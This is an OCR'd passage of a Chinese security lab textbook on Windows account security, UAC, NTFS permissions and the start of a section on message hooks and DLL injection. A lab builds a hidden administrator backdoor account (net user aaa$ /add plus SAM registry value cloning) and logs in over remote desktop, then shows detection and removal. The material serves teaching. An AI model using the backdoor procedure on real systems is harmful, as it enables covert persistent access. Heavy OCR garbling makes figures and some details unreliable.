UAC 是 Windows Vista 的 核心 安全 功能 ,消除 了 以 管理 员 身 份 登录 带 来 的 风险 。 任 何 
用 户 登录 到 计算 机 后 ,系统 为 该 用 户 创建 一 个 访问 令 牌 。 该 访问 令 牌 包含 有 关 授予 给 该 用 
户 的 访问 权限 级 别 的 信息 ,其 中 包括 特定 的 安全 标识 符 (SID) 和 Windows 权限 。 

当 管理 员 登 录 到 计算 机 时 ,Windows Vista 为 该 用 户 创建 两 个 单独 的 访问 令 牌 : 标准 
用 户 访 问 令 牌 (Standard User Token) 和 管理 员 访 问 令 牌 (Admin Token)。 标 准 用 户 访问 
令 牌 包含 的 用 户 特定 信息 与 管理 员 访 问 令 牌 包含 的 信息 相同 ,但 是 已 经 删除 管理 Windows 
权限 和 SID。 标 准 用 户 访问 令 牌 用 于 启动 不 执行 管理 任务 的 应 用 程序 ( 即 标准 用 户 应 用 程 
序 )。 当 管理 员 需 要 运行 执行 管理 任务 的 应 用 程序 ( 即 管理 员 应 用 程序 ) 时 , Windows Vista 
提示 用 户 将 他 们 的 安全 上 下 文 从 标准 用 户 更 改 或 “提升 ?为 管理 员 。 该 默认 管理 员 用 户 体验 
称 为 “管理 审核 模式 ”。 在 该 模式 下 ,应 用 程序 需要 特定 的 权限 才能 以 管理 员 应 用 程序 (具有 
与 管理 员 相 同 访问 权限 的 应 用 程序 ) 运 行 。 

如 果 用 户 是 标准 用 户 登 录 到 计算 机 时 , Windows 7 下 该 用 户 可 以 输入 一 个 本 地 
Administrators 组 成 员 的 账户 的 用 户 名 和 密码 ,而 “动态 ”提升 管理 员 权限 (类 似 有 Linux 下 
的 sudo 命令 )。 

(1) 需要 解禁 Administrator 并 指定 密码 。 执 行 lusrmgr. msc 命令 ,打开 用 户 组 控制 单 
元 ,并 在 其 中 解禁 Administrator 并 设置 密码 。 

(2) 普通 模式 下 的 cmd 中 ,执行 命令 runas /user:administrator cmd. exe, 则 打开 一 个 
以 管理 员 身 份 运 行 的 cmd。 之 后 会 像 Linux 的 sudo 一 样 .要 求 输入 管理 员 的 密码 。 

(3) 新 打开 的 cmd 中 ,执行 需要 提升 权限 的 操作 ,例如 arp -d。 执 行 后 用 exit 命令 退出 。 

Administrators 组 和 Standard Users 组 的 用 户 操作 权限 具体 表现 如 下 。 

(1) Administrators 组 权限 : 

D 安装 操作 系统 和 组 件 (例如 硬件 驱动 程序 .系统 服务 等 ) 。 

© 安装 Service Packs 和 Windows Packs, 
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O 升级 操作 系统 。 

@ 修复 操作 系统 。 

O 配置 关键 操作 系统 参数 ,例如 密码 策略 ,访问 控制 .审核 策略 、 内 核 模 式 驱动 程序 配置 等 。 

获取 已 经 不 能 访问 的 文件 的 所 有 权 。 

@ 管理 安全 措施 和 审核 日 志 。 

@ 备份 和 还 原 系统 。 

(2) Standard Users 组 权限 : 

中 用 户 不 能 修改 系统 注册 表 设 置 .操作 系统 文件 或 程序 文件 。 

@ 用 户 可 以 关闭 工作 站 但 不 能 关闭 服务 器 。 

© 可 以 创建 本 地 组 ,但 只 能 修改 自己 创建 的 本 地 组 。 

@ 可 以 运行 由 管理 员 安装 和 配置 的 程序 。 

© 对 自己 的 所 有 数据 文件 (% userprofile%) 和 自己 的 那 一 部 分 注册 表 (HKEY_ 
CURRENT_USER) 有 完全 的 控制 权 。 

账户 安全 的 一 般 策略 是 : 

(1) 限制 不 必要 的 用 户 。 

系统 的 账户 越 多 ,黑客 们 得 到 合法 用 户 权限 的 可 能 性 一 般 也 就 越 大 ,因此 删除 不 必要 的 
用 户 有 助 于 提升 系统 安全 性 。 

(2) 创建 两 个 管理 员 账 户 。 

不 用 内 建 的 Administrator 账户 登入 系统 ,创建 一 个 自 定义 的 用 户 名 加 入 管理 员 组 。 

(3) 修改 管理 员 账 户 和 创建 陷阱 账户 。 

黑客 往往 会 从 Administrator 账户 入 手 开始 进攻 ,有 必要 修改 内 建 的 Administrator 账 
户 名 。 方 法 是 : 运行 组 策略 ,打开 “本 地 安全 设置 "对话 框 ,依次 展开 “本 地 策略 ”一 “安全 选 
项 ”, 在 右边 窗 格 中 有 一 个 “账户 : 重 命名 系统 管理 员 账 户 ” 的 策略 , 双击 打开 它 , 给 
Administrator 重新 设置 一 个 平淡 的 用 户 名 ,不 要 使 用 Admin 之 类 的 名 字 , 尽 量 把 它 伪装 成 
普通 用 户 , 例 如 改 成 : guestone。 然 后 新 建 一 个 名 称 为 Administrator 的 “ 受 限 制 用 户 ” 作 为 
陷阱 账户 ,把 它 的 权限 设置 成 最 低 , 什 么 事 也 干 不 了 ,并 且 加 上 一 个 超过 10 位 的 超级 复杂 密 
码 。 这 样 可 以 让 黑客 把 时 间 浪 费 在 这 个 陷阱 账户 中 ,并 且 可 以 借 此 发 现 黑客 的 入 侵 企 图 。 

(4) 创建 Good 密码 。 

2010 年 知名 网 站 CSDN 的 用 户 数 据 库 发 生 一 次 严重 的 暴 库 泄密 事件 ,涉及 的 账户 总 量 
高 达 600 多 万 个 。 据 统计 ,公布 的 6 428 632 个 CSDN 账户 显示 有 239 万 人 的 密码 存在 重 
复 ,在 所 有 密码 中 ,有 235 000 人 使 用 123456789 作为 密码 ,重复 率 高 居 榜 首 。 好 的 (Good) 
密码 设置 建议 如 下 。 

(D 绝 不 要 用 admin、root 或 administrator 作为 管理 员 账 户 的 登录 名 。 

@ 一 个 好 的 密码 (如 图 7-1 所 示 ) 是 : 

名 私人 的 : 仅仅 只 有 一 个 人 知道 和 使 用 。 

芯 秘 密 的 : 它 不 以 明文 的 形式 出 现在 任何 文件 上 或 程序 或 贴 在 终端 上 的 一 张 纸 上 。 

忆 简 单 好 记 : 所 以 没有 必要 写 下 来 。 

忆 至 少 8 个 字符 ,复杂 ,至 少 3 个 以 下 的 混合 组 合 : 大 写字 母 、 小 写字 母 ,数字 和 标点 

符号 。 


己任 何 程序 在 有 限 的 时 间 内 都 不 能 得 出 密码 ,例如 不 到 一 周 的 时 间 。 

各 经 常 改变 ,例如 每 3 个 月 改变 一 次 。 

注意 ,有 人 可 能 会 看 到 用 户 打字 。 如 果 用 户 在 登录 的 时 候 错误 地 在 用 户 名 的 输入 框 中 
输入 了 密码 , 则 密码 可 能 会 出 现在 系统 日 志 中 。 


Merry Christmas 
Bad Password 


MerryChrisToYou 


(Synonym) 


(Intertwine 
Letters) (convert vowels Merry Jul (Abbreviate) 
to numeric) 
May Jul 
(Keypad shift MerChr2You 
Right…Up) 
MXemrays Glad*Jes*Birth 
Tod MsrryXmls Mart*Jul 
Password | sazesd | Jq46Sjqw mErcHr2yOu 
图 7-1 Good 密码 


K 7-1 给 出 了 一 个 Good 密码 的 具体 例子 。 
表 7-1 Good 密码 示例 
Combine 2 unrelated words Mail+ phone= m@ !lfon3 


Abbreviate a phrase My favorite color is blue= Mfciblue 


Happy birthday to you, 
Happy birthday to you, 
Music lyric Happy birthday dear John, 
happy birthday to you. 
hb2uhb2uhbdJhb2u 


2) 用 户 访问 权限 

NTFS 权限 一 般 有 6 种 : 完全 控制 ,修改 , 读 取 和 运行 , 列 出 文件 夹 目 录 , 读 取 , 写 人 。 

(1) 完全 控制 (Full Control) : 该 权限 允许 用 户 对 文件 夹 、 子 文件 夹 ,文件 进行 全 权 控 
制 , 如 修改 资源 的 权限 .获取 资源 的 所 有 者 、 删 除 资源 的 权限 等 ,拥有 完全 控制 权限 就 等 于 拥 
有 了 其 他 所 有 的 权限 。 

(2) 修改 (Modify) : 该 权限 允许 用 户 修改 或 删除 资源 ,同时 让 用 户 拥有 写 入 、 读 取 和 运 
行 权限 。 

G) 读 取 和 运行 (Read & Execute); 该 权限 允许 用 户 拥有 读 取 和 列 出 资源 目录 的 权限 ， 
另外 也 允许 用 户 在 资源 中 进行 移动 和 遍历 ,这 使 得 用 户 能 够 直接 访问 子 文件 夹 与 文件 ,即使 
用 户 没 有 权限 访问 这 个 路 径 。 

(4) 列 出 文件 夹 目录 (List Folder Contents): 该 权限 允许 用 户 查看 资源 中 的 子 文件 夹 与 
文件 名 称 。 
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(5) 读 取 (Read) : 该 权限 允许 用 户 查 看 该 文件 夹 中 的 文件 以 及 子 文件 夹 ,也 允许 查看 
该 文件 夹 的 属性 、 所 有 者 和 拥有 的 权限 等 。 

(6) 写 入 (Write) : 该 权限 允许 用 户 在 该 文件 夹 中 创建 新 的 文件 和 子 文件 夹 ,也 可 以 改 
变 文件 夹 的 属性 、 查 看 文件 夹 的 所 有 者 和 权限 等 。 

3) 访问 控制 基本 原则 

(1) 拒绝 优 于 允许 原则 。 

拒绝 优 于 允许 原则 是 一 条 非常 重要 且 基 础 性 的 原则 ,用 于 处 理 因 用 户 在 用 户 组 的 归属 
方面 引起 的 权限 “纠纷 ”。 

(2) 权限 最 小 化 (也 称 为 最 小 特权 ) 原 则 。 

权限 最 小 化 原则 在 保持 完整 性 方面 起 着 重要 的 作用 。 权 限 最 小 化 原则 是 指 用 户 所 拥有 
的 权力 不 能 超过 他 执行 工作 时 所 需 的 权限 。 这 一 原则 的 应 用 可 限制 事故 ,错误 .未 授权 使 用 
带 来 的 损害 。 

(3) 权限 继承 性 原则 。 

权限 继承 性 原则 可 以 让 资源 的 权限 设置 变 得 更 加 简单 。 假 设 现在 有 个 DOC 目录 ,在 
这 个 目录 中 有 DOC01.DOC02.DOC03 等 子 目 录 , 现 在 需要 对 DOC 目录 及 其 下 的 子 目 录 均 
设置 “ABC” 用 户 有 “ 写 和 ”权限 。 因 为 有 继承 性 原则 ,所 以 只 需 对 DOC 目录 设置 ABC 用 户 
有 写 入 权限 ,其 下 的 所 有 子 目 录 将 自动 继承 这 个 权限 。 

(4) 累加 原则 。 

假设 现在 ABC 用 户 既 属于 A 用 户 组 ,也 属于 B 用 户 组 , 它 在 A 用 户 组 的 权限 是 “ 读 
取 ”, 在 B 用 户 组 中 的 权限 是 “ 写 和 信 ”, 那 么 根据 累加 原则 ,ABC 用 户 的 实际 权限 将 会 是 “ 读 
取 十 写 人 ”两 种 。 

拒绝 优 于 允许 原则 是 用 于 解决 权限 设置 上 的 冲突 问题 的 ; 权限 最 小 化 原则 是 用 于 保障 
资源 安全 的 ; 权限 继承 性 原则 是 用 于 “自动 化 ”执行 权限 设置 的 ; 而 累加 原则 则 是 让 权限 的 
设置 更 加 灵活 多 变 。 几 个 原则 各 有 所 用 ,缺少 哪 一 项 都 会 给 权限 的 设置 带 来 很 多 麻烦 。 

【 例 7-1] 以 标准 用 户 账 户 ABC 登录 之 后 ,建立 一 个 文件 夹 /文件 , 则 该 文件 夹 /文件 
的 所 有 者 就 是 ABC。 管 理 员 账 户 或 者 管理 员 组 可 以 剥夺 该 文件 /文件 夹 的 所 有 权 , 使 它 的 
所 有 者 发 生 改 变 。 

【 例 7-2] ABC 账户 对 于 某 个 文件 夹 test 的 NTFS 权限 为 只 读 ,Administrators 组 对 
于 文件 夹 test 的 NTFS 权限 为 修改 ,Users 组 对 于 文件 夹 test 的 NTFS 权限 为 写 人 。ABC 
属于 Administrators 组 。 问 : ABC 账户 身份 登录 访问 文件 夹 test 时 ,最 终 有 效 权 限 是 
IAR 

分 析 : 


ABC 身份 登录 最 终 权限 
= BBC 所 属于 的 所 有 组 针对 该 文件 夹 NTFS 权限 的 累加 
+ ABC 对 于 该 文件 夹 的 单独 NTFS 权限 
= 修改 + 写 人 + 只 读 = 修改 


【 例 7-3] ABC 账户 对 于 文件 夹 test 的 NTFS 权限 为 只 读 ,Administrators 组 对 于 文 
件 夹 test 的 NTFS 权限 为 完全 控制 ,Users 组 对 于 文件 夹 test 的 NTFS 权限 为 拒绝 访问 。 
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B 组 针对 文件 夹 test 的 权限 为 完全 控制 ,ABC 属于 Administrators 组 。 问 : ABC 账户 身份 
登录 访问 文件 夹 test 时 ,最 终 有 效 权限 是 什么 ? 
分 析 : 


ABC 身份 登录 最 终 权 限 
= ABC 所 属于 的 所 有 组 针对 该 文件 夹 NTFS 权限 的 累加 
+ ABC 对 于 该 文件 夹 的 单独 NTFS 权限 
= 只 读 + 完全 控制 + 拒绝 
= 拒绝， 


即 优先 权 : 拒绝 二 完全 控制 二 修改 。 
5. 实践 操作 及 步骤 


1) 建立 和 删除 系统 隐藏 账户 

当 黑 客人 侵 一 台 主 机 后 ,通常 会 留 下 后 门 以 便 长 时 间 地 控制 该 主机 , 较 常 见 的 是 账户 隐藏 
技术 ,一 般 用 户 很 难 发 现 系统 中 隐藏 账户 的 存在 。 下 面 给 出 Windows 7 系统 的 设置 过 程 。 

(1) 简单 隐藏 账户 。 

单 击 “开始 ”一 "运行 ”, 输 入"CMD"” 运 行 “ 命 令 提 示 符 ”。 

O 输入 "net user aaa $ /add" 增 加 一 个 密码 为 空 的 “aaa $ ”账户 。 

© 输入 “net localgroup administrators aaa $ /add” 将 "aaa$ ”加 入 管理 员 用 户 组 。 

© 输入 “net user aaa /add” 增 加 测试 账户 。 

@ 输入 net user 查看 有 哪些 用 户 , 如 图 7-2 所 示 , 没 有 显示 “aaa$ ”账户 , 即 被 隐藏 了 。 


:Msers\hdnministrator?net users 


SS2011-20111221uN 的 用 户 账户 


Adninistrator 


图 7-2 账户 列表 


进入 控制 面板 的 “用 户 账户 ”>“ 管 理 账 户 ”, 还 是 可 以 看 到 “aaa $ ”账户 。 这 种 方法 只 能 
将 账户 在 “命令 提示 符 ” 中 进行 隐藏 ,而 无 法 将 账户 在 控制 面板 中 隐藏 。 

(2) 复杂 账户 隐藏 。 

复杂 账户 隐藏 即 通过 修改 注册 表 来 隐藏 账户 ,注册 表 中 的 HKEY _ LOCAL _ 
MACHINE\SAM\SAM 注册 项 存储 着 账户 相关 信息 ,默认 情况 下 无 法 展开 该 项 ,这 是 因为 
系统 没有 给 予 管理 员 修改 权限 。 但 是 可 以 手动 给 管理 员 赋 予 修改 权限 。 右 击 SAM 注册 项 弹 
出 右键 菜单 如 图 7-3(a) 所 示 , 单 击 “权限 ? 子 菜单 ,弹出 “SAM 的 权限 ”设置 对 话 框 ,如 图 7-3(b) 
所 示 。 

在 图 7-3(b) 中 选中 Administrators 账户 ,在 下 方 的 权限 设置 处 勾 选 “完全 控制 ”, 完 成 后 
单 击 “ 确 定 ” 按 钮 即 可 ,SAM 项 都 可 以 展开 了 。 图 7-3(b) 中 有 可 能 没有 Administrators 账 

,需要 单 击 “ 添 加 ”按钮 ,弹出 “选择 用 户 或 组 ”对 话 框 ,如 图 7-4 所 示 。 
在 图 7-4(a) 中 单 击 “ 高 级 ”按钮 ,这 时 的 “选择 用 户 或 组 ”对 话 框 如 图 7-4(b) 所 示 。 
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Administrators 的 权限 外) 
完全 控制 
读 取 


选择 此 对 象 类 型 G) - 
用 户 、 姐 或 内 村 安全 主体 
查找 位 置 9) 
2011-20111221YE GE. 
ARP ER 338 TW W: 

EE 
Er | CE Gm) 


(a) 单 击 * 高 级 "按钮 


选择 此 对 得 类 型 G): 

用 户 、 组 或 内 置 安全 主体 EEDA 
IRGAT: 

2011-20111221W _ 位置. 


一 般 性 查询 


£O) REA J | HJE). 
nio: Ees y | FE 
口 华 用 的 帐户 @) Caim) 
OTER 
自 上 次 登录 后 89 天数 0 [ æ 
aE 
araRU: [=m | 
名 称 GD 所 在 文件 卖 > 


ryz wasu a 


Ña Authenticated Users 
Backup Operators 2011-201112.. 


(b) 立即 查找 并 选择 Administrators 账 户 
7-4 添加 账户 


201-20111221 


输入 对 象 名 称 来 选择 TD D: 


[Eno] 


(c) 显示 已 选择 的 账户 
图 7-4 ( 续 ) 


在 图 7-4(b) 中 单 击 “ 立 即 查 找 ” 按 钮 ,显示 本 机 所 有 用 户 和 组 ,选择 Administrators 账 
户 。 单 击 “ 确 定 ” 按 钮 后 ,“ 选 择 用 户 或 组 ”对 话 框 如 图 7-4(c) 所 示 , 显 示 已 选择 的 账户 名 称 ， 
单 击 “ 确 定 ” 按 钮 后 为 其 修改 权限 。 

取得 注册 表 操 作 权限 后 ,就 可 以 展开 SAM 注册 项 ,在 \Domains\Account\ Users \ 
Names 下 显示 出 系统 中 所 有 存在 的 账户 aaa aaa $ , Administrator 和 Guest, 对 应 的 账户 类 
型 为 : 000003EA.000003F9.000001F4 和 000001F5 ,如 图 7-5 所 示 。 


图 7-5 展开 SAM 注册 项 


将 aaa $ 账户 的 键 值 导 出 为 aaa $. reg, 同 时 将 000003E9 和 000001F4 项 分 别 导 出 为 
user. reg admin. reg。 用 “记事 本 ”打开 admin. reg. 将 其 中 下 值 后 面 的 内 容 复制 下 来 .替换 


user. reg 中 的 下 值 内 容 , 完 成 后 保存 。000001F4 中 的 下 值 示例 如 下 : 


[HKEY_LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000001F4] 
"F" = hex:02, 00,01, 00, 00, 00, 00, 00, 40, 20, fe, 07, 69, 9b, cf, 01, 00, 00, 00, 00, 00, 00, 00, \ 00, bc, 


08,87,90, 03,54, cf, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, \ £4, 01, 00, 00, 01, 
02,00,00, 10, 02, 00, 00, 00, 00, 00, 00, 00, 00, 01, 01, 01, 00, 00, 00, 00, \00, 00, 00, 88, 52, 35, 00 


"v" = hex:00, 00, 00, 00, bc, 00, 00, 00, ~- 
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接 下 来 进入 “命令 提示 符 ”, 输 入 “net user aaa $ /del” 将 建立 的 隐藏 账户 删除 。 最 后 ， 
将 aaa $. reg FI user. reg 导 人 注册 表 , 至 此 ,隐藏 账户 制作 完成 ,最 后 设置 SAM 项 的 权限 ， 
将 Administrators 所 拥有 的 权限 全 部 取消 。 

图 7-6 显示 当 计 算 机 回 到 登录 界面 时 ,只 会 显示 aaa 和 Administrator 而 不 会 显示 aaa $ , 
同时 在 控制 面板 的 账户 管理 界面 也 不 会 显示 aaa $ 。 


图 7-6 登录 界面 


(3) 验证 方法 。 

简单 验证 方式 : 在 命令 提示 符 中 输入 “net user aaa $ 123456”( 修 改 密码 ) ,如 果 aaa $ 
账户 存在 则 显示 命令 执行 成 功 ,否则 显示 “ 找 不 到 用 户 名 ”。 

远程 桌面 验证 方式 : 设计 算 机 BAP 地 址 : 192. 168. 0. 103) 中 存在 隐藏 账户 aaa $ , 则 
计算 机 A 通过 “远程 桌面 连接 ”( 附 件 菜单 中 ) 利 用 隐藏 账户 aaa $ 远程 登录 计算 机 B, BAE 
步 又 如 下 。 

O 查看 计算 机 B 是 否 开启 服务 Remote Desktop Services ,在 命令 提示 符 中 输入 
“services. msc” 启 动 * 服 务 ” 对 话 框 ,如 图 7-7 所 示 ,如果 该 服务 未 启动 则 选择 右键 菜单 中 的 
“启动 子 菜单 即 可 。 


文件 (月 EA) EEV WAH) 
=l s s| v m n 
Q 服务 (本 地 ) 


Ü Remote Procedure Call (RPC) - 在 W- 
(Q Remote Procedure Call (RPC) RPC. 
Ñ Remote Desktop Services Us.. 允许 -. 
Ü Remote Desktop Services Eiai 


Ü Remote Access Connection M... 
f Remote Access Auto Connecti.. F8.. 
(Q, Quality Windows Audio Video.. 优质 .. 


PERS 


7-7 “服务 ”对 话 框 


© 计算 机 B: 右 击 桌面 上 的 “计算 机 ”图 标 选择 “属性 ”菜单 项 , 则 打开 如 图 7-8 所 示 的 
设置 界面 , 单 击 “ 远 程 设置 ”. 弹 出 “系统 属性 ”对 话 框 并 显示 “远程 ”选项 卡 ,完成 如 图 7-8 所 
示 的 设置 。 


“| 可 v SHm 所 有 控制 面板 项 + z 


目 允许 运程 协助 连接 这 台 计算 机 ao 
a 
Caan. ) 
HAT 
PEART, RERET 如果 需 要 )。 
O 不 允许 连接 到 这 台 计 算 机 


e 人 


大助 我 选择 


C e= J 


图 7-8 计算 机 远程 设置 


@ 计算 机 B: 关闭 安全 软件 的 防火 墙 ,如 关闭 ESET 中 的 个 人 防火 墙 , 如 图 7-9 所 示 。 
e 
| ESETSMART SECURITY 7 


7-9 ESET 个 人 防火 墙 


@ 计算 机 A: 保证 能 ping 通 计算 机 A, 即 “ping 192. 168. 0. 103” 命 令 成 功 。 然 后 选择 
“开始 ”一 “附件 ”一 “远程 桌面 连接 ”, 配 置 过 程 如 图 7-10 所 示 。 

(4) 清除 隐藏 账户 的 方法 。 

将 SAM 项 里 存在 的 账户 和 “计算 机 管理 ”中 存在 的 账户 进行 比较 ,多 出 来 的 账户 就 是 
隐藏 账户 了 。 直 接 删除 以 隐藏 账户 命名 的 项 即 可 。 

如 果 黑 客 制作 了 一 个 修改 注册 表 型 隐藏 账户 ,在 此 基础 上 删除 了 管理 员 对 注册 表 的 操 
作 权 限 ,那么 管理 员 是 无 法 通过 注册 表 删 除 隐藏 账户 的 ,甚至 无 法 知道 黑客 建立 的 隐藏 账户 
名 称 。 可 以 借助 “组 策略 ”的 帮助 ,让 黑客 无 法 通过 隐藏 账户 登录 。 运 行 “ 组 策略 ”, 依 次 展开 
“计算 机 配置 ”>“Windows 设置 "一 “安全 设置 "一 “本 地 策略 ”一 “审核 策略 ”, 双击 右 边 的 


| RP: an-aonlzznnrwaninirtrweer 
wtpistaptmqimiastin- 


E sue) 


图 7-10 远程 桌面 连接 


“审核 策略 更 改 ”, 在 弹出 的 设置 窗口 中 色 选 “成 功 ”, 然 后 单 击 “ 确 定 ” 按 钮 。 对 “审核 登录 事 
件 ” 和 “审核 过 程 追踪 ”进行 相同 的 设置 ,开启 登录 事件 审核 功能 。 

进行 登录 审核 后 ,可 以 对 任何 账户 的 登录 操作 进行 记录 ,包括 隐藏 账户 ,这 样 就 可 以 通 
过 “计算 机 管理 ”中 的 “事件 查看 器 ”准确 得 知 隐藏 账户 的 名 称 ,甚至 黑客 登录 的 时 间 。 即 使 
黑客 将 所 有 的 登录 日 志 删 除 , 系 统 还 会 记录 是 哪个 账户 删除 了 系统 日 志 , 这 样 黑客 的 隐藏 账 
户 就 暴露 无 疑 了 。 通 过 事件 查看 器 找到 隐藏 账户 。 

得 知 隐藏 账户 的 名 称 后 ,因为 没有 权限 仍然 不 能 删除 这 个 隐藏 账户 ,但 是 可 以 在 “命令 
提示 符 ” 中 输入 “net user 隐藏 账户 名 称 654321? 更 改 这 个 隐藏 账户 的 密码 。 这 样 这 个 隐藏 
账户 就 会 失效 ,黑客 就 无 法 再 用 这 个 隐藏 账户 登录 了 。 

2) Cacls 命令 的 使 用 

(1) 访问 System Volume Information 目录 。 

System Volume Information 文件 夹 是 一 个 隐藏 的 系统 文件 夹 , 中 文 名 称 可 以 翻译 为 
“系统 卷 标 信息 ”。 这 个 文件 夹 里 存储 着 系统 还 原 的 备份 信息 。“ 系 统 还 原 ” 工 具 使 用 该 文件 
夹 来 存储 它 的 信息 和 还 原点 。 计 算 机 的 每 个 分 区 上 都 有 一 个 System Volume Information 
文件 夹 。 右 击 该 文件 夹 选择 “属性 ”菜单 ,弹出 “System Volume Information 属性 ”对 话 框 ， 
如 图 7-11 所 示 。 

图 7-11(a) (注意 与 图 7-11(b) 的 区 别 ) 显 示 该 文件 夹 仅 有 SYSTEM 用 户 有 权限 ,而 
Administrator 用 户 没有 访问 权限 ,木马 往往 存储 在 该 文件 夹 中 ,利用 其 保护 躲避 杀毒 软件 
的 查 杀 。 利 用 cacls 命令 赋予 用 户 Administrator 完全 控制 权限 。 在 命令 提示 符 下 输入 : 


cacls "G:\System Volume Information" /E /G Administrator:F 


对 象 名 称 : G:\System Volume Information 
组 或 用 户 名 (G): 


要 更 改 权限 ， 请 单 击 “ 编 辑 ”。 
SISTEM 的 权限 P) 

完全 控制 

修改 

读 取 和 执行 


列 出 文件 夹 内 容 

读 取 

Ls 和 = 
PERREN, 请 单 击 “ 高 


了 刘 访 aisil 和 各 限 
=== == 
(a) 


图 7-11 “System Volume Information 属性 ”对 话 框 


则 Administrator 用 户 可 以 访问 该 文件 夹 。 图 7-11(b) 显 示 执 行 上 述 命令 后 该 文件 夹 的 属 
性 。 如 果 将 管理 员 账 户 换 成 标准 账户 aaa, 会 有 什么 效果 ? 用 标准 账户 aaa 登录 计算 机 后 能 
否 访问 该 文件 夹 ? 读者 可 以 自行 实践 。 

(2) 记事 本 notepad. exe 的 权限 修改 。 

(Q 在 Administrator 账户 下 将 其 对 notepad. exe 的 访问 权限 去 掉 ,测试 能 否 运行 
notepad. exe, 测 试 能 否 恢复 其 访问 权限 。 

@ fE Administrator 账户 下 将 标准 账户 aaa 对 notepad. exe 的 访问 权限 去 掉 ,将 计算 机 
桌面 切换 到 标准 账户 aaa 下 ,看 能 否 运行 notepad. exe, 

© 在 标准 账户 aaa 下 将 自身 对 notepad. exe 的 访问 权限 去 掉 ,然后 切换 到 
Administrator 账户 ,看 能 否 运行 notepad. exe, 能 和 否 恢 复 其 访问 权限 。 

®© 在 标准 账户 aaa 下 能 否 将 Administrator 账户 对 notepad. exe 的 访问 权限 去 掉 ? 如 
果 执 行 成 功 , 切 换 到 Administrator 账户 ,看 能 否 运 行 notepad. exe, 能 否 恢 复 其 访问 权限 。 

3) 修改 管理 员 账 户 和 创建 陷阱 账户 

实践 步骤 见 预 备 知识 。 


6. 思考 题 


在 Administrator 账户 下 和 标准 账户 aaa 下 执行 工具 XueTr. exe 有 什么 不 同 ? 请 解释 
原因 。 


消息 钧 子 和 DLL 注入 


1. 实践 目的 
理解 Windows 的 消息 机 制 和 DLL 注入 的 基本 原理 。 
2. 实践 环境 


(1) ÆA Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 等 
操作 系统 。 
(2) 实践 工具 : ExplorerSuite,procexp. exe,Spy++ (SPYXX. EXE) 。 


3. 名 词 解释 


(1) 消息 机 制 : 操作 系统 发 送 给 应 用 程序 的 一 个 通知 , 它 告 诉 应 用 
程序 一 个 事件 的 发 生 。 例 如 , 单 击 鼠标 、 改 变 窗 口 尺 寸 . 按 下 键盘 上 的 一 
个 键 都 会 使 Windows 发 送 一 个 消息 给 相应 的 应 用 程序 。 

(2) 消息 钩子 : MessageHook ,是 Windows 消息 处 理 机 制 的 一 个 平 
台 , 应 用 程序 可 以 在 上 面 设置 子 程序 以 监视 指定 窗口 的 某 种 消息 ,而 且 
所 监视 的 窗口 可 以 是 其 他 进程 所 创建 的 。 当 消息 到 达 后 ,在 目标 窗口 处 
理 函 数 之 前 处 理 它 。 钧 子 机 制 允许 应 用 程序 截获 处 理 Windows 消息 或 
特定 事件 。 

(3) 窗口 句柄 : 系统 通过 窗口 句柄 唯一 标识 一 个 窗口 ,发 送 一 个 消 
息 时 必须 指定 一 个 窗口 句柄 ,表明 该 消息 由 哪个 窗口 接收 。 而 每 个 窗口 
都 会 有 自己 的 窗口 过 程 ,所 以 用 户 的 输入 会 被 正确 地 处 理 。 

(4) DLL ÈA: 将 一 个 DLL 放 进 某 个 进程 的 地 址 空间 里 ,让 它 成 为 
那个 进程 的 一 部 分 。 如 果 将 外 部 DLL 通过 线程 形式 注入 到 其 他 进程 
中 ,这 样 的 过 程 就 叫 注入 线程 或 者 叫 线程 注入 。 


4. 预备 知识 


1) Windows 消息 机 制 

Windows 的 消息 系统 是 由 3 个 部 分 组 成 的 。 

(1) 消息 队列 。Windows 能 够 为 所 有 的 应 用 程序 维护 一 个 消息 队 
列 。 应 用 程序 必须 从 消息 队列 中 获取 消息 ,然后 分 派 给 某 个 窗口 。 


PeekMessage 或 GetMessage 函数 从 Windows 消息 队列 中 获取 消息 。 

(2) 消息 循环 。 通 过 这 个 循环 机 制 , 应 用 程序 从 消息 队列 中 检索 消息 ,再 把 它 分 派 给 适 
当 的 窗口 ,然后 继续 从 消息 队列 中 检索 下 一 条 消息 ,再 分 派 给 适当 的 窗口 ,依次 进行 。 

(3) 窗口 过 程 。 每 个 窗口 都 有 一 个 窗口 过 程 来 接收 传递 给 窗口 的 消息 , 它 的 任务 就 是 
获取 消息 然后 响应 它 。 窗 口 过 程 是 一 个 回调 函数 ,处 理 了 一 个 消息 后 , 它 通常 要 返回 一 个 值 
给 Windows。 

常见 的 Windows 消息 有 窗口 移动 、 鼠 标 移动 、 窗 口 大 小 改变 ,键盘 操作 等 ,部 分 定义 如 
表 8-1。 


表 8-1 常见 的 Windows 消息 


Windows 消息 说 B 
WM_MOUSEMOVE 鼠标 移动 消息 
WM_LBUTTONDOWN 鼠标 左 键 按 下 消息 
WM_LBUTTONUP 鼠标 左 键 释放 消息 
WM_RBUTTONDOWN 鼠标 右键 按 下 消息 
WM_RBUTTONUP 鼠标 右键 释放 消息 
WM_KEYDOWN 按键 按 下 消息 
WM_KEYUP 按键 释放 消息 
WM_PAINT 窗口 显示 区 域 更 新 消息 
WM_CLOSE 窗口 关闭 消息 


PeekMessage 或 GetMessage 函数 从 Windows 消息 队列 中 获取 消息 ,并 发 送 消息 到 指 
定 窗 体 ,一 般 通 过 以 下 两 个 函数 完成 : SendMessage 和 PostMessage。 

【 例 8-1] 举例 说 明 消息 的 传递 过 程 : 利用 程序 从 外 部 关闭 记事 本 窗口 ,窗口 标题 “新 
# ”文本 文档 . txt -记事 本 ”, 程 序 的 核心 编码 如 下 。 


CWnd * cw; // 窗 口 类 ， 

Cw = FindWindow(NULL, "新建 文本 文档 .txt - 记事 本 "); // 通 过 窗口 标题 获取 其 类 

HWND ocrhWnd; 

ocrhWnd = cw — > GetSafeHwnd( ) ; // 通 过 窗口 类 获取 记事 本 的 窗口 句柄 
PostMessage( ocrhWnd, WM_CLOSE, 0, 0) ; // 向 记事 本 的 窗口 发 送 关闭 消息 


通过 这 种 方式 ,可 以 控制 另 一 个 程序 的 窗口 动作 ,如 窗口 的 隐藏 .最 大 化 .最 小 化 等 变 
化 ,控制 窗口 的 菜单 .按钮 动作 等 。 

2) WEAF 

钩子 是 一 个 处 理 消 息 的 程序 段 ,通过 系统 调用 ,把 它 挂 人 系统。 每 当 特 定 的 消息 发 出 ， 
